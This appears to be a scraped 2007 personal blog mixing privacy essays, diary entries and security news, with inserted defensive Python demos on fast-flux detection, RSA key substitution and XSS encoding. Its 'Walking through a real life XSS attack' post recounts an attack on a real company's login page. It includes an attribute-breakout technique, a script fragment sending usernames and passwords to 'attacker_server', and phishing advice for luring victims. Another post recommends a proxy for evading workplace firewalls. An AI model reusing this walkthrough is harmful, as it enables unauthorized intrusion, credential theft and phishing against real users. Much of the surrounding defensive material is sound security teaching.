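One thing defenders can do beyond user education is spot flux-style behaviour in resolver logs. This is an added Python example (not from the post) that scores a hostname from successive DNS lookups on the features that separate fast flux from an ordinary content delivery network: a low TTL, many distinct addresses, addresses scattered across unrelated networks, and high turnover between lookups. The hostnames, addresses and thresholds are constructed for illustration; a /16 prefix stands in for the ASN lookup a real detector would use.

```python
import ipaddress
from statistics import mean

# Constructed DNS answer snapshots: per name, a list of (ttl_seconds, A records)
# from successive lookups. Addresses are drawn from reserved ranges and are not real hosts.
SNAPSHOTS = {
    # CDN-style name: low TTL and several addresses, but one provider block and little turnover.
    "static.cdn-example.test": [
        (60, ["198.18.10.1", "198.18.10.2", "198.18.10.3"]),
        (60, ["198.18.10.2", "198.18.10.3", "198.18.10.1"]),
        (60, ["198.18.10.1", "198.18.10.4", "198.18.10.2"]),
    ],
    # Flux-style name: low TTL, addresses spread over unrelated networks, almost no overlap.
    "login-secure-update.test": [
        (120, ["198.18.44.7", "198.19.200.13", "100.64.3.9", "203.0.113.77"]),
        (120, ["198.19.7.250", "100.64.90.1", "198.18.131.4", "203.0.113.78"]),
        (120, ["100.64.200.2", "198.19.63.11", "198.18.9.99", "198.18.250.1"]),
    ],
    # Ordinary single-host site.
    "www.ordinary-business.test": [(3600, ["198.18.5.5"]), (3600, ["198.18.5.5"])],
}


def flux_features(snapshots):
    """Summarise a name's lookups into the four features used below.

    churn is the mean fraction of addresses in each lookup that did not appear
    in the previous one; distinct_nets counts /16 prefixes as a stand-in for ASNs.
    """
    seen, nets, new_fraction, prev = set(), set(), [], None
    for _, answers in snapshots:
        current = set(answers)
        if prev is not None:
            new_fraction.append(len(current - prev) / len(current))
        prev = current
        seen |= current
        nets |= {str(ipaddress.ip_network(a + "/16", strict=False)) for a in current}
    return {
        "min_ttl": min(ttl for ttl, _ in snapshots),
        "distinct_ips": len(seen),
        "distinct_nets": len(nets),
        "churn": mean(new_fraction) if new_fraction else 0.0,
    }


def looks_fast_flux(features, max_ttl=300, min_ips=5, min_nets=3, min_churn=0.5):
    """All four conditions must hold; thresholds are illustrative, not tuned on real data."""
    return (features["min_ttl"] <= max_ttl
            and features["distinct_ips"] >= min_ips
            and features["distinct_nets"] >= min_nets
            and features["churn"] >= min_churn)


def classify_all(snapshots=SNAPSHOTS):
    return {name: looks_fast_flux(flux_features(lookups)) for name, lookups in snapshots.items()}


if __name__ == "__main__":
    for name, lookups in SNAPSHOTS.items():
        print(name, flux_features(lookups), "FLUX" if looks_fast_flux(flux_features(lookups)) else "ok")
```

The reason all four conditions are required is that a CDN also shows a low TTL and many addresses; what it does not show is addresses in unrelated, often consumer, networks with near-total turnover between lookups, and that is the part that comes from compromised machines rather than a provider's pool.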
praise be to far from l33t0 at 13:39 0 cries of outrage
work, drugs, and love
Ok so I have a job now. But I don't have a car like I had anticipated (because l33to's parents passed a lemon off to me and now i'm stuck with the damn thing - those shysters.) I'm at my second day on the job right now, and so far I've learned a little bit about how the company works, but past that I'm completely incapable of doing any assignment or work that anyone (do i have a boss?) might give me. I've been pretty much just sitting around, surfing the net (as I used to do way back in the day... I've since become pretty self-sufficient in my entertainment harvesting, however I feel that's more due to the immense boredom I feel at the prospect of doing anything). I check a couple sites, but I only really get a good half-hour of things I'm interested in, and the rest I'm just clicking links hopelessly, hoping to stumble upon anything to keep me busy for at least 3 more minutes (and yes, i am aware of the website 'stumbleupon').
My mental state is slowly stabilizing since yesterday, as I nearly had a complete meltdown in the car ride home last night from my first day. I'm death obsessed and I can't get over my ex-girlfriend who has repeatedly treated me with complete indifference, and whose great parting gift to me was "get a grip." Maybe I do need to get a grip. No i definitely do. But I really don't know how I'm going to get it. I've sworn to myself to forget all about the past and just move on. Easier said than done, but I've done a good job at leaving myself no choice by acting as mentally unstable as possible for the majority of the last week.
ok so I'm getting a grip: here's the day-to-day plan. I'm looking for a new car, I'm streamlining my life and focusing on positivity, I've decided that all spare time spent at work not doing work will be spent outlining a series of short stories I'm writing (which center around a girl in a coma - but it's never mentioned that she's in a coma - and her two past boyfriends, one who leaves her but that isn't mentioned and instead he's treated to a colorful and twisted death, and the other who secretly plans to put her in a coma - but that's not mentioned either) that will hopefully be realized as genius and will help me get into grad school. less painful pining, more prosaic opining - that's the immediate plan. Past that, maybe this crazy scammy financial career might take off, but it's doubtful and certainly not what I want to be doing for the rest of my life. Save money; Grad school. Grip time.
oh and I'd like to move out of my house and into l33to's apt. but my asshole friend Brad (who's not really an asshole) has already got his grubby giganti-man hands all over that room. That jerk. Now he's going to go buy me Wendys. He's a pal.
praise be to Robert at 11:42 1 cries of outrage
word of the day
entropy (noun) - (in data transmission and information theory) a measure of the loss of information in a transmitted signal or message.
praise be to far from l33t0 at 09:45 0 cries of outrage
RSA and public key encryption
for those interested in RSA and public key encryption i thought it'd be interesting to post a list of the ten largest known primes, to grant one solace in knowing they shan't fear the idea of guessable primes despite the current (emphasis on current) finite list of known primes. however, it should be noted that public key encryption is vulnerable to man-in-the-middle attacks, where an attacker can falsely assume one of the receiving end points and provide a fake public key.
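To make the man-in-the-middle point concrete, here is an added Python example (mine, not from the post) that simulates the key substitution with textbook RSA on small primes: Alice encrypts to whatever public key she is handed, so a substituted key lets the attacker read the message and forward it re-encrypted to the real recipient, who notices nothing. The second half shows the standard answer: Alice compares the presented key's fingerprint against one obtained out of band and refuses to encrypt on a mismatch. The primes, party names and message are constructed, and the unpadded RSA is for illustration only.

```python
import hashlib
from math import gcd

# Small primes for a readable demonstration; real keys use ~2048-bit moduli and padding.
BOB_PRIMES = (104729, 1299709)
MALLORY_PRIMES = (104723, 15485863)
E = 65537


def keygen(p, q, e=E):
    """Textbook RSA key pair: returns ((n, e), (n, d))."""
    n, phi = p * q, (p - 1) * (q - 1)
    assert gcd(e, phi) == 1
    return (n, e), (n, pow(e, -1, phi))


def encrypt(public, message):
    n, e = public
    m = int.from_bytes(message, "big")
    assert m < n, "message too large for this toy modulus"
    return pow(m, e, n)


def decrypt(private, ciphertext, length):
    n, d = private
    return pow(ciphertext, d, n).to_bytes(length, "big")


def fingerprint(public):
    """Short hash of the public key; the value Alice would learn out of band."""
    n, e = public
    return hashlib.sha256(f"{n}:{e}".encode()).hexdigest()[:16]


BOB_PUBLIC, BOB_PRIVATE = keygen(*BOB_PRIMES)
MALLORY_PUBLIC, MALLORY_PRIVATE = keygen(*MALLORY_PRIMES)


def run_exchange(message, mitm, pinned_fingerprint=None):
    """Alice sends `message` to Bob using the public key that arrives over the wire.

    mitm=True means Mallory replaced Bob's key with her own in transit.
    Returns (outcome, bytes Bob reads or None, bytes Mallory reads or None).
    """
    presented = MALLORY_PUBLIC if mitm else BOB_PUBLIC          # what Alice actually receives
    if pinned_fingerprint is not None and fingerprint(presented) != pinned_fingerprint:
        return "rejected", None, None                          # key does not match the pinned one
    ciphertext = encrypt(presented, message)
    mallory_reads = None
    if mitm:
        mallory_reads = decrypt(MALLORY_PRIVATE, ciphertext, len(message))
        ciphertext = encrypt(BOB_PUBLIC, mallory_reads)        # forward so Bob sees a normal message
    return "delivered", decrypt(BOB_PRIVATE, ciphertext, len(message)), mallory_reads


if __name__ == "__main__":
    print(run_exchange(b"k3y1", mitm=False))
    print(run_exchange(b"k3y1", mitm=True))
    print(run_exchange(b"k3y1", mitm=True, pinned_fingerprint=fingerprint(BOB_PUBLIC)))
```

The weak step is not the primes but the delivery of the public key: whoever controls that channel can swap it. Pinning a fingerprint is the minimal form of the fix; certificates signed by a trusted authority or a web of trust are the same idea with the out-of-band step delegated.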
praise be to far from l33t0 at 08:51 0 cries of outrage
7.17.2007
flaws in iPhone's web dial
just received this email from a member of the webappsec mailing list...
The Apple iPhone's Safari web browser has a special feature that allows the user to dial any phone number displayed on a web page simply by tapping the number. SPI Labs has discovered that this feature can be exploited by attackers to perform various attacks, including:
-Redirecting phone calls placed by the user to different phone numbers of the attacker's choosing
-Tracking phone calls placed by the user
-Manipulating the phone to place a call without the user accepting the confirmation dialog
-Placing the phone into an infinite loop of attempting calls, through which the only escape is to turn off the phone
-Preventing the phone from dialing
These types of attacks can be launched from a malicious website, from a legitimate website that has Cross-Site Scripting vulnerabilities, or as part of a payload of a web application worm.
For example, an attacker could determine that a specific website visitor "Bob" has called an embarrassing number such as an escort service. An attacker can also trick or force Bob into dialing any other telephone number without his consent, such as a 900-number owned by the attacker or an international number. Finally, an attacker can lock Bob's phone, forcing Bob to either make the call or hard-reset his phone, resulting in possible data loss.
SPI Labs researchers reported these issues to Apple on July 6 and are working with Apple to remediate the problems. However, SPI Labs recognizes the unique urgency of these issues and the large number of people that could be affected. As such, SPI Labs recommends that iPhone users do not use the built-in Safari browser to dial telephone numbers until Apple resolves these issues.
And no, it's not a buffer overflow. I'd be hard pressed to buffer overflow my way out of a Win95 box :-)
praise be to far from l33t0 at 20:24 0 cries of outrage
word of the day
perfidious (adj) - deliberately faithless; deceitful. Synonyms: false, disloyal, unfaithful. "dr. comfort probably won't find solace in blaming me for his mother's perfidious relationship with his father."
praise be to far from l33t0 at 09:08 1 cries of outrage
7.16.2007
George Orwell, a literary hypocrite?
So I just recently finished reading George Orwell’s dystopian novel 1984, not really for the sake of personal enjoyment but rather as a tool of reference for future information privacy/information dissemination readings I’m sure to come across in the near future. In my field of study 84 is referenced as commonly as Lindsay Lohan rehab stories are covered by CNN. At first they seem interesting and amusing, but eventually they lead to an inevitably all too familiar annoyance. Despite this “annoyance” I felt an obligation to reread the novel, feeling as though my lackluster skim through back in high school wasn’t quite good enough.
So anyway, here’s my book report. The novel is incredibly slow and doesn’t pick up until you’re 100 pages in or so. Then it picks up a little bit but not enough to keep you fully enthralled. You struggle through till the end; eventually reach a somewhat interesting conclusion and that’s it. Oh yeah, it’s also a metaphorical piece representing Orwell’s ill feelings towards totalitarianism and imperialism. The end.
In "Politics and the English Language," George Orwell provides six rules for writers:
- Never use a metaphor, simile, or other figure of speech which you are used to seeing in print.
- Never use a long word where a short one will do.
- If it is possible to cut a word out, always cut it out.
- Never use the passive voice where you can use the active.
- Never use a foreign phrase, a scientific word, or a jargon word if you can think of an everyday English equivalent.
- Break any of these rules sooner than say anything outright barbarous.
Take notice of the two rules highlighted in bold. 84 is engrossed with some complicated dialog and by no means do you get the impression he is “cut[ting]” back in order to benefit from simplicity. Here’s a list of 246 vocabulary words from 1984 commonly found on the SATs, varying in difficulty. Granted, not all of them are all that difficult, but a number of them are.
Also interesting, in 1984 we the reader are commonly exposed to a concept known as doublethink. Doublethink is “the act of holding two contradictory beliefs simultaneously, fervently believing both.” So are Orwell’s six rules for writers simply a self-induced instance of doublethink?? Is it the case that he truly believes in these said rules yet at the same time believes in the polar opposite and proves so through contradictions in his writings???
I think it’s safe to say I’ve discovered something big here. Call the press.
praise be to far from l33t0 at 13:57 0 cries of outrage
angry
hm so just stumbled upon this interesting tidbit.
"In March, the Justice Department's Inspector General revealed that FBI agents had sent a flurry of fake emergency letters to phone companies, asking them to turn over phone records immediately by promising that the proper papers had been filed with U.S. attorneys, though in many cases this was a complete lie. More than 60 of these letters were made public today as part of a FBI document dump in response to a government sunshine lawsuit centered on the FBI's abuse of a key Patriot Act power."
instead of me getting mad and composing a 1000 word rant i've decided simply to quote a user from the digg community in response to the article.
"the government lies?"
praise be to far from l33t0 at 13:20 0 cries of outrage
word of the day
capitulate (verb) - to surrender unconditionally or on stipulated terms; to give up resistance. Synonyms: yield, acquiesce, accede, give in.
praise be to far from l33t0 at 10:32 0 cries of outrage
7.13.2007
Wii SQL statements
Who wants to do work on a Friday afternoon right before the weekend?? Certainly not I, so instead I've decided to waste a little time writing up a few pro-Nintendo Wii/hate on XBox360 and PS3 SQL statements. If this doesn't get me laid I don't know what will.
praise be to far from l33t0 at 15:16 0 cries of outrage
Walking through a real life XSS attack
This is a segment from a cross-site scripting (XSS) paper I wrote recently for graduate school, “Introduction to Reflected XSS”. It should be noted that this is a real-life attack I performed on a real company’s login application; however, I removed the URL and company name for obvious reasons. I walk through the various steps taken, including finding a legitimate XSS hole, manipulating the hole, writing a malicious script to exploit the hole, and finding potential victim users. Feel free to leave both questions and suggestions in the comments; I’d love to hear them. Without further ado, here’s the attack (most interesting) portion of my paper.
Walking Through a Reflected XSS Attack
Introduction - Now I’m going to walk you through an actual real-life reflected XSS attack and explain the steps taken in doing so. For obvious reasons a great deal of information regarding the victim’s Web app and URL will not be disclosed. Also, this XSS attack is being revealed to improve application developers’ understanding of XSS and to make apparent how many Web apps are in fact susceptible to such attacks.
Evaluate your target’s Web app from an attacker’s perspective - First things first, let’s evaluate and study our target Web app. Let’s begin by evaluating the interface in Figure 1.4. We see our target Web app is for “Company X” and is similar to many other common login Web apps. It is composed of two text fields: one for a user’s “Username” and the other for the user’s “Password”. The next thing I notice is the URL query shown in Figure 1.3.
For obvious reasons the first segment of the URL has been removed; however, the interesting section still remains. The first thing I notice is the '/cgi-exe/' in the URL.
CGI (Common Gateway Interface) is a standard protocol for interfacing external application software with an information server, commonly a web server. This allows the server to pass requests from a client Web browser to the external application. The Web server can then return the output from the application to the Web browser. Next, I notice the ‘pg=index’ in the URL query. The word “index” simply points out that this is the top end or head node of the tree for the Web app that can branch off into many other additional children pages once one attains access. This information is very important to me because many Web apps using CGI are susceptible to reflected XSS attacks in the URL query.
Right off the bat I have a perfect spot to insert my test script to see if this Web app might be vulnerable to XSS. So I take a stab at it and insert my alerting “test” script into the URL query seen in Figure 1.5.
After running the test script it first appears as though it was unsuccessful. Instead of receiving a pop-up window alert I receive the following page
At a quick glance it appears as though nothing happened and I simply had the original “index” page returned, but if you take a close look inside the “Enter Username and Password” form you’ll notice an out-of-place quotation mark and greater-than character (“>). It becomes quite apparent that my test script did have an effect on the Web app, despite not being my original desired effect. Oftentimes when pen testing (penetration testing) you’ll stumble upon unexpected results from actions made that are very informative and can be used later down the line.
My next step is to take a look at the HTML source code to see what is going on with the (“>) in the middle of the “Enter Username and Password” form. Below is a segment of the source code revealing a great deal of information about the placement of my script as well as a great deal of other useful information.
Take a good look at the red text above. Disregard NAME=”uname” and NAME=”pass” we’ll get back to that, but rather focus on our script and where it was inserted into the html source.
The once ambiguous (“>) in the middle of the Web app form can now be explained. The test script I wrote was inserted in the middle of the “INPUT TYPE” tag, and because of my quotation marks (“) and use of the greater-than (>) and less-than (<) symbols, it was mistakenly treated as code closing the tag, leaving the desolate (“>) by itself in the middle of the form. By quickly looking at the code I realize all it will take is a quick fix and my script should run correctly. I simply need to insert a (“>) in the URL query before my script. This will close off the “INPUT TYPE” tag and thus permit my script to run correctly. Now take a look below at the new and improved URL query. Highlighted in red is the modification made.
Now once we run this script we receive the following.
SUCCESS!! We can now see with the modifications made above that we are in fact capable of running successful scripts and thus this site is in fact susceptible to Cross-Site Scripting attacks. Next on our “to do” list is writing a malicious script to take advantage of this hole.
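The stray (“>) is the tell that the query value was written into an attribute without encoding. As an added Python example (not part of the paper), here is a rendering of the login form with that defect beside the hardened version, plus a small HTML-parser audit that shows what the browser sees in each case. The hidden ‘pg’ field and the exact markup are assumptions about the page’s form; the form action is the one quoted later in the post. The probe is a harmless marker in the shape the paper describes: a quote and a greater-than to close the tag, followed by a new tag.

```python
import html
from html.parser import HTMLParser

# Constructed markup; the hidden 'pg' field is an assumption about the original form.
FORM_HEAD = '<form action="/cgi-exe/cpage.dll" method="GET">'
FORM_TAIL = '<input type="text" name="uname"><input type="password" name="pass"></form>'


def render_login_unsafe(pg):
    """Reproduces the defect in the post: the query value lands in a value attribute as-is."""
    return FORM_HEAD + f'<input type="hidden" name="pg" value="{pg}">' + FORM_TAIL


def render_login_safe(pg):
    """Same page with attribute-context encoding: quotes and angle brackets become
    entities, so the value can never terminate the attribute or the tag."""
    return FORM_HEAD + f'<input type="hidden" name="pg" value="{html.escape(pg, quote=True)}">' + FORM_TAIL


class _Audit(HTMLParser):
    """Records the tags a browser would create, the pg field's value, and any loose text."""

    def __init__(self):
        super().__init__()
        self.tags, self.pg_value, self.stray_text = [], None, ""

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "pg":
            self.pg_value = attrs.get("value")

    def handle_data(self, data):
        self.stray_text += data


def audit(rendered):
    parser = _Audit()
    parser.feed(rendered)
    parser.close()
    return {"tags": parser.tags, "pg_value": parser.pg_value, "stray_text": parser.stray_text}


PROBE = '"><b>probe</b>'   # constructed: closes the attribute and the tag, then opens a new element

if __name__ == "__main__":
    print("unsafe:", audit(render_login_unsafe(PROBE)))
    print("safe:  ", audit(render_login_safe(PROBE)))
```

In the unsafe rendering the audit shows an extra element, an emptied pg value and the leftover “> as loose text, exactly the symptom in the screenshot; in the safe rendering the tag list is unchanged and the whole probe is still the attribute’s value. The encoding must match the context the value is written into: attribute encoding here, and a different routine if the same value were ever written inside a script block.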
Writing your own malicious script to manipulate the target - The tough part of our job is done; now it’s time to be creative and write a script that will help me as an attacker obtain a client’s username and password. Remember, Cross-Site Scripting isn’t a direct attack against the Web application but rather an attack on the Web application’s users.
As mentioned earlier, Cross-Site Scripting attacks are very diverse and can be performed in countless ways. In this scenario, I as the attacker wish to steal the values of the username and password fields as a victim logs in. After doing some research I discovered a clever idea for a malicious script that would work nicely here. The concept of this script was taken from a Cross-Site Scripting paper written by Kevin Spett of SPI Dynamics. Before we delve into the script, let’s take another hard look at the HTML source code from our target site.
It is now time to focus on NAME=”uname” and NAME=”pass”. Both of these refer to the fields that will accept the Username and the Password. The username field has been named “uname” and the password field has been named “pass”. Generally Web app developers aren’t very creative with field names. Field names for usernames and passwords are for the most part very easy to find in the source code. We now have the necessary information for our script. So by placing the script below into the URL query and injecting it into the code we should be able to obtain an unsuspecting victim’s Username and Password. (form action="/cgi-exe/cpage.dll" method="GET") – The form will perform an HTTP GET request, which will have data sent via query strings.
uname.value+':'+document.forms(1).pass.value") -- Next we specify the URL of the newly created image, that URL being ‘attacker_server’ and following that would be the values of the “login” and “password” fields containing the victim’s data.
Finding user victims – Now that we’ve found a hole in the Company X Web app and written a malicious script to exploit it, our next step is finding user victims. Finding victims can be done in many different ways however creativity and one’s social engineering skills are key. Social engineering is the practice of obtaining confidential information by manipulation of legitimate users. A social engineer will commonly use the telephone or Internet to trick people into revealing sensitive information or get them to do something that is against typical policy. By this method, social engineers exploit the natural tendency of a person to trust his or her word (Mitnick).
Thank you and we apologize for the inconvenience
For the link we simply use the HTML below incorporating our script.
Once the victim follows the link and logs in, the username and password are sent over to my server, thus giving me a valid account to do with what I please. This technique is often referred to as “Phishing”. Phishing is an attempt to fraudulently acquire private information, including passwords, credit card data, social security numbers, etc., by masquerading as a trustworthy person or business in an electronic communication. That should do it, good luck, be ethical.
praise be to far from l33t0 at 08:59 4 cries of outrage
word of the day
inchoate (adj) - in an initial or early stage; incomplete; disorganized: "The act of writing forces one to clarify inchoate thoughts."
praise be to far from l33t0 at 08:54 0 cries of outrage
7.12.2007
the concept of “secondary use”
In continuation to my post regarding Daniel Solove’s most recent paper I decided to focus on one of his more compelling points regarding a concept known as secondary use (also, this is simply a diminutive personal exercise for myself to make sure my brain has not yet failed me despite lack of sleep and an immeasurably mind-numbing summer internship).
First, let’s focus on the characteristics of the “nothing to hide argument”, the most common argument faced by all privacy advocates when denouncing both legal and illegal government surveillance (key word being “surveillance”). The “nothing to hide argument” focuses on only two kinds of privacy problems (see Taxonomy of Privacy for additional privacy problems): the disclosure of personal information and information-collecting surveillance. By using the “nothing to hide argument” one blindly closes the door to the vast number of other privacy problems that exist, one of these being “secondary use”. The argument close-mindedly and unfairly assumes a particular view about what privacy entails without delving past the surface of the concept.
So what meaning does the problem of secondary use hold in the context of information privacy? Solove claims it “involves data being collected for one purpose being used for an unrelated purpose without people’s consent.” This is pretty straightforward, with no ambiguous lawyer semantics, common of most Solove publications. I often attribute the idea of secondary use to evil companies that enjoy selling my information to third parties for targeted advertising purposes. By no means when I originally submitted my personal information to a company or organization for one purpose did I intend to have it distributed for other things like targeted advertising.
Now pause, take a minute to think: when you sign a contract with a phone company or ISP you disclose personal information as a means to use their services. The contract isn’t hard to understand; you want to use their services and are willing to submit your personal information to go about doing so. But where in that contract does it say you are also submitting your personal information to be used by the government for data mining purposes?? Nowhere. The “nothing to hide” argument doesn’t come close to defending this problem simply because it doesn’t acknowledge its existence. You’re signing a binding contract for one purpose, yet it’s being used for multiple purposes without the individual’s permission or oversight. Is that right?? And who’s the one monitoring the government’s data mining techniques to make sure no wrongdoing is being done, the government?? That’s like saying we should have allowed Enron (RIP) the ability to regulate itself.
praise be to far from l33t0 at 12:41 0 cries of outrage
word of the day
sagacious (adj) - having or showing acute mental discernment and keen practical sense; Synonyms - shrewd.
praise be to far from l33t0 at 08:26 2 cries of outrage
7.11.2007
how's your mood? how's that song?
Do you ever just feel dumb? I feel sometimes so immediate, so in that particular moment, that I'm infinitely ashamed of every moment not spent studying everything up to that point. And then it passes, but not without a dwindling fear that aches in the back of my spine for hours.
I woke up today in horrible pain. I had greatly underestimated (as I had similarly in the previous 22 years of my life) the virtue of stretching before activity. Sure, you could say "well, you're just getting back into exercise, of course you're going to be a little sore. It'll pass." And it will, but it's damned frustrating and defeating at the moment. Dragging myself up from bed (not by personal choice or outside motivation, but rather due to the slumber-zombie slap of the snooze button on my particular alarm clock that, for a reason unknown to me still, is set for an hour long snooze session and doesn't apparently have anything to do with shutting the actual alarm off - the alarm buzzes on throughout the snoozing period, playing a cruel joke on me), I turned on the light, eventually gave up with the damn clock and just turned it off, and I was officially awake - for better or for worse. It was worse, as it turned out, with instant pains like tetanus needles piercing the backs of my quads with ever shuffled, stumbling step.
I came to the quick conclusion after some coffee, a cigarette, some excedrin, two slices of left-over pizza (excellent breakfast food) I'd hidden from other family members in the vegetable crisper, that I was definitely not going to be venturing on an early morning run today. Anyway, it looked soggy out and, while that would never bother me in the least usually, I used it as ammunition for my pitied self-reassurance.
Not to look a day in the face at 11 a.m. and admit defeat so soon, I conceded to smoking a bowl and mowing the lawn. By noon the sun had come out and the damp grass was back to its bleached blond summer self. The still-wet branches of the pines pricked my shoulder as I mowed past them, adding annoyance to only the beginning of the mow. The hour went by smoothly, soundtracked by sonic youth, animal collective, blitzen trapper, and any band that could fuzz-slash its way into my morning soul.
I'm planning on applying to more jobs later, when I'm less sleepy.
praise be to Robert at 17:24 0 cries of outrage
how to combat the "i have nothing to hide argument"
anyone remotely interested in the field of information privacy should read this paper asap. it's the most recent publication from distinguished attorney and george washington professor, daniel solove. the paper entitled, "i've got nothing to hide," and other privacy misunderstandings, is a thought provoking piece that combats the simplistic argument you hear from idiots willing to succumb to government pressure and sacrifice their privacy rights simply because they feel as though "they have nothing to hide".
for those of you that don't know solove, he's basically about 10 years ahead of his time in regards to privacy law. currently there isn't much going on in the field, in fact it's almost impossible to find a privacy profession (the only one that comes to mind are attorneys writing privacy policies for different company websites) but i can promise you soon information privacy will become a significant player finding its own niche in the information security field.
i've read just about every solove paper (A Taxonomy of Privacy probably being his best) and strongly recommend his book, The Digital Person.
praise be to far from l33t0 at 15:16 0 cries of outrage
word of the day
misanthrope (noun)- one who hates people; a hater of humankind. "one might say dr. comfort is an inconspicuous misanthrope hidden behind a deceitful grin."
praise be to far from l33t0 at 08:19 1 cries of outrage
7.10.2007
what's the day? what's you doin?
Dr. Comfort Road to Recovery Journal: Day Two
I give up.
Ok not really. I'm still going strong, but not without setbacks. My second day of intensive self-reversal came with a late start, with my waking up at 10:30 rather than the planned 9 (which was pushed back from the previous day's foolishly set 7), making me feel already a little less productive right from the beginning. I didn't get straight up and run, either, like I had planned. I milled around for a bit, mulled over some oil-slick lookin' coffee, and then committed my second major offense of the morning: I had a cigarette before my run. As I puffed away and considered that I'd be huffin' and high-topping the hot hot pavement in less than 15, I couldn't help but feel like a complete idiot. But I just kept going on.
In the end it wasn't a completely worthless day. I did make it to that run, although it was cut short and with additional walking periods set between the running ( due to several factors not involving the cigarette, including: it was hott as dogg balls, my muscles were sore a something fierce from yesterday's workout and run, and also just because I was feeling much less empowered today). Taking everything in, I'm looking into adding some pre-run "stretching" to the routine, and not frowning upon future walk periods (walking is healthy and active too - I'm not looking to run a marathon or even be in that better shape, I just need something to get me going in the morning).
After some job hunting and exercise and whatnot, I found myself feeling pretty good again; feeling like the day, while not as successful as the first, was at least a comparative second place, which was appropriate and I laughed at my own joke in my head.
praise be to Robert at 16:14 0 cries of outrage
word of the day
intransigent (adj) - refusing to agree or compromise; (noun) a person who refuses to agree or compromise, as in politics. Synonyms - uncompromising; inflexible; stubborn
praise be to far from l33t0 at 13:21 0 cries of outrage
5 ways to better one’s individual perspective on life
1. Promote autonomy amongst yourself and others – It’s through our individuality and diversity of mindset that we, as living, thinking beings, are enabled to move forward in life without fear or hesitation. Avoid tunnel vision. One should look at a situation from a number of perspectives in order to grasp a comprehensive understanding of the task(s) at hand. This autonomous freedom of individual thinking will simply result in new ideas enabling individuals and society to prevent stagnation, progress, and move forward.
2. Live for the now, take risks – One who is willing to take risks is someone who is willing to make sacrifices. Individuals willing to make sacrifices in the face of fear are willing to go the extra mile for themselves. They have enough love for themselves that despite conscious knowledge of potential failure they know they’ve succeeded regardless of the end result. Fear of failure shouldn’t handicap one’s existence but should rather be a form of incentive to persevere and accomplish goals.
3. The glass is half full approach – Yes, I know, we’ve all heard this before but it’s this type of mentality that makes living worth living. Granted, anyone can make the conscious choice to go through life always looking at things from a negative perspective but where does that get you? A positive perspective on the other hand enables an individual to succeed and overcome hardship while at the same time preventing one from becoming overly consumed with fear of failure. Take a minute, smile, and believe in yourself and in others.
4. Focus on yourself as an individual; don’t become overly concerned with others – You yourself are your own person and in that lies the essence of life’s beauty. Life is an amazing privilege bestowed upon all of us. We as sovereign individuals have the innate ability to use our own intuition when it comes to making decisions, learning, accepting others, and framing our own unique mindset. Who better to make decisions concerning individuals than individuals with a thoroughly profound understanding of themselves?
5. Have sexual relations with as many individuals as possible – Self explanatory
praise be to far from l33t0 at 09:33 0 cries of outrage
7.09.2007
michigan state definition
word of the day
equivocal (adj.) - ambiguous; unclear; subject to more than one interpretation -- often intentionally so: "Republicans complained that Bill Clinton's answers were equivocal." (v. equivocate)
praise be to far from l33t0 at 21:23 0 cries of outrage
dr. comfort road to recovery: day one
Like a last message sent from earth out into space before the eventual great collapse of this civilization comes, I implore you to listen to my story. It's not a pretty story, and it's not even all that inspiring, but it has the opportunity to become one of those inspiring stories, if you listen.
I have found myself among a new group of disillusioned young people (currently the only group I can pretend to belong to), who have graduated from college, the supposed end all be all and consummate pedigree of a white collar youth background, and found that those starched white collars that once seemed so close have been huddled away by selfish baby-boomers more concerned with their own dwindling life expectancies and the number of boats they can afford in retirement than with refreshing the workforce with young upstarts hungry for experience and with talent to spare.
Do I sound angry? Probably, but anger is not my driving force anymore. I've decided to turn over a new leaf and live a life charged with positive energy. Slighted by the delusional lower-middle-upper class of a small town no more, I am setting a new standard in my own life and looking forward to opportunities every new day.
Sleeping until noon? a thing of the past. Smoking marijuana religiously? (and by that, i don't mean just once on Sundays), think again cheech. Drowning my sorrows daily? only if I'm appropriately stressed out by a day of hard work. I'm reversing the stigma of the slacker credo; for too long I've believed a life to be worth more than the amount of pages in a resume, and while I still believe that to be true, I've found that a life is nothing without a record. It's nothing without some hard evidence to point to and say: yea, I did that.
So I'm going to do That, every day. You're invited and more than welcome to join me on my new misadventures. Though they may not always be sunny, they'll at least beat burning yourself with cigarettes and crying in a corner (take my word for it). Hopefully, in a year's time, I can look back at this long road and realize that the journey was worth the trials, and very possibly that the journey is a reward in itself.
Stagnation be damned, I'm looking forward.
praise be to Robert at 13:54 0 cries of outrage
7.06.2007
auction off exploits, make some bank
a new site, WabiSabiLabi, has just been launched which enables security researchers to auction off exploits they discover in various web apps and back-end systems. from what i've gathered any researcher who discovers a flaw can then register with the independent security lab, submit the exploit, and then have WabiSabiLabi personally verify its validity.
personally i think this is a step in the right direction. every year a vast number of security analysts "ethically disclose" vulnerabilities to companies and organizations and receive little to no recognition or compensation for donating their time and efforts. sometimes these organizations go so far as to threaten taking legal action against someone who has voluntarily revealed a security hole to raise the company's awareness...hm, so yeah, that seems like the right thing to do...
it'll be interesting to see how they work to combat malicious buyers from purchasing exploits. if they can somehow manage to regulate this effectively it could provide an interesting marketplace for researchers and supportive organizations looking to improve their security.
praise be to far from l33t0 at 10:20 0 cries of outrage
word of the day
amalgamate/amalgamating (verb) - to mix or merge so as to make a combination. synonyms: blend; unite; combine.
praise be to far from l33t0 at 10:01 2 cries of outrage
more iPhone hacking, no need for AT&T
it appears that prominent norwegian hacker jon johansen has done it again and made the impossible possible. some of you may remember him from years back as "DVD" jon or the guy that circumvented the DVD anti-piracy encryption code. come on, you remember DeCSS right?? probably one of the most brilliant reverse engineering feats of the last decade. well, on july 3rd he reported in his blog that he was successfully able to manipulate the newly released iPhone and activate the device without signing up for AT&T. with the recently discovered hack, "the iPhone does not have phone capability (yet), but the iPod and Wi-Fi work" according to johansen.
praise be to far from l33t0 at 09:16 0 cries of outrage
7.05.2007
new web proxy
just stumbled upon a new web proxy that works pretty well, my vioxx attorney (interesting name). it's significantly faster than the one i was using previously and i haven't had many issues with it dropping requests. so for those of you at work/school seeking privacy and looking for ways around your company's firewall i suggest using this.
praise be to far from l33t0 at 14:12 0 cries of outrage
word of the day
for some odd reason i get off on expanding my vocabulary and learning new words. thus i have decided to add "word of the day" to the blog. basically every day i'll make a quick post with a given vocab word and its corresponding definition(s) and throughout the course of the day i'll make a feeble attempt at actually using the word in a given real life scenario. after doing so, i'll update the original "word of the day" post and explain how i went about verbally implementing my newfound knowledge as well as explaining how it went over with my unsuspecting vocab victim.
